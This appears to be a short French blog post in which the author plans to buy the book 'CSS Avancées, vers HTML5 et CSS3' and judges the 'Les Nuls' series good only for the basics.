Quelqu’un m’a conseillé ce livre, et je vais pas tarder à l’acheter. Il s’agit de « CSS Avancées, vers HTML5 et CSS3« . Ce livre est certainement un « must have » dans le domaine, et donc un peu plus cher, mais tant pis.

Cela confirme vraiment ce que je pense de la collection « Les Nuls » : des bons bouquins pour connaître l’essentiel, point final.